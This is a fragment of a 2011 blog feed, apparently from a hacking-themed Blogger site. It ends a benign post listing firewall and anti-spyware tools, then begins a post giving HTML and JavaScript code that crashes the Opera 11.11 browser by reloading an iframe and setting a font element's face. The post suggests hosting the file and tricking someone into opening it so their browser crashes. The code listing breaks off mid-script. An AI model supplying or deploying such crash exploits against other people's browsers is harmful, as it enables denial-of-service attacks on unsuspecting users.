&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;a.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Zone Alarm [&lt;/span&gt;&lt;a href="http://www.zonealarm.com/"&gt;http://www.zonealarm.com&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;b.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Sygate
Personal Pro [&lt;/span&gt;&lt;a href="http://www.tucows.com/thankyou.html?swid=213160"&gt;http://www.tucows.com/thankyou.html?swid=213160&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;c.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Kerio Personal
Firewall &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;d.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;AVG
Internet Security Firewall [&lt;/span&gt;&lt;a href="http://www.avg.com/us-en/home-small-office-security"&gt;http://www.avg.com/us-en/home-small-office-security&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;But again I would say that getting a good firewall do not
ends the story. Its just a part of solution. Besides frewalls, you must also
use one or more anti-spywares to check your system for current infections. As
an add-on safety, I would recommend you o use spyware removal tools to make
your system more infection free. These all are useful for this task:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;a.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Spybot [&lt;/span&gt;&lt;a href="http://spybot-virus-scan.com/"&gt;&lt;span style="line-height: 115%;"&gt;http://spybot-virus-scan.com&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;b.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Webroot Spy
Sweeper [&lt;/span&gt;&lt;a href="http://webroot.com/wb/products/spysweeper"&gt;&lt;span style="line-height: 115%;"&gt;http://webroot.com/wb/products/spysweeper&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;c.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Spyware
Doctor [&lt;/span&gt;&lt;a href="http://pctools.com/spyware-doctor"&gt;&lt;span style="line-height: 115%;"&gt;http://pctools.com/spyware-doctor&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;d.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Bazooka [&lt;/span&gt;&lt;a href="http://www.kephyr.com/spywarescanner"&gt;&lt;span style="line-height: 115%;"&gt;http://www.kephyr.com/spywarescanner&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;e.&lt;span style="-moz-font-feature-settings: normal; -moz-font-language-override: normal; font-family: &amp;quot;Times New Roman&amp;quot;; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="line-height: 115%;"&gt;Hijack This
[&lt;/span&gt;&lt;a href="http://spychecker.com/program/hijackthis.html"&gt;&lt;span style="line-height: 115%;"&gt;http://spychecker.com/program/hijackthis.html&lt;/span&gt;&lt;/a&gt;&lt;span style="line-height: 115%;"&gt;] [&lt;/span&gt;Advanced
Users&lt;span style="line-height: 115%;"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;Some of them can even deal with the things in which
antiviruses do not takes interest. These things include ad-ware, Trojans, key
loggers, track wares, etc. Along with scanning part, they would tell you how to
uninstall them these potentially unwanted apps, and that’s too with step by
step instructions. &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="line-height: 115%;"&gt;I assures you going ahead with this procedure will simply
make you immune to spyware and ad wares, apart from your expertise in web
surfing. &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-1358996203378457479?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/1358996203378457479/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/getting-rid-from-adwares-and-spywares.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1358996203378457479?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1358996203378457479?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/getting-rid-from-adwares-and-spywares.html' title='Getting Rid from Adwares and Spywares'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CU8CR304eSp7ImA9WhRSE00.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-2461156085120645990</id><published>2011-11-14T12:40:00.001-08:00</published><updated>2011-11-14T12:51:06.331-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-14T12:51:06.331-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackingZone'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Stuff'/><category scheme='http://www.blogger.com/atom/ns#' term='Browser Hacks'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title>Opera 11.11 Crash Vulnerabilty Discussion</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://cdn.slashgear.com/wp-content/uploads/2010/04/Opera-Logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="http://cdn.slashgear.com/wp-content/uploads/2010/04/Opera-Logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
Opera 11.11 Web browser , which is vulnerable to DOS, and can
be used to crash it down remotely. The trick lies in refreshing/ reloading an
IFRAME and then putting an infinite loop on some of its element. For this time
we are going to use Font element.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
So open up your Opera and load the exploit [which is in an
HTML file] into it. You can get the exploit code from &lt;a href="http://pastie.org/2605398"&gt;here.&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Save this text in form of a HTML file. When we open this
file in opera, goes up and crashes it down within a fraction of seconds. The
best part of this exploit is, you can also crash an Opera remotely, say
uploading our file to any of the free web hosting sites and then asking someone
to open it. Doing so would crash his opera down.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&amp;nbsp;Anyways, lets discuss the code.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in; mso-yfti-tbllook: 1184;"&gt;

 &lt;tbody&gt;
&lt;tr style="mso-yfti-firstrow: yes; mso-yfti-irow: 0; mso-yfti-lastrow: yes;"&gt;
  &lt;td style="padding: 0in 0in 0in 0in;" valign="top"&gt;&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;1&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;2&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;3&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;4&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;5&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;6&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;7&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;8&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;9&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;10&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;11&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;12&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; text-align: right;"&gt;
&lt;span style="color: #999999; font-family: Consolas; font-size: 9pt;"&gt;13&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style="padding: 0in 0in 0in 0in;" valign="top"&gt;&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;html&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp; &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;body&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;iframe src&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'about:blank'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; id&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'bo0om'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; style&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;"width:0px;height:0px;border:0px none;"&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;iframe&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;script type&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp; language&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;"javascript"&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var a &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; window.document.getElementById(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'bo0om'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var b &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;
  a.contentDocument.createElement(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'font'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; a.src&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'about:blank'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; setTimeout(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'b.face = "h3h";'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;,&lt;/span&gt;&lt;span style="color: #cf6a4c; font-family: Consolas; font-size: 9pt;"&gt;100&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
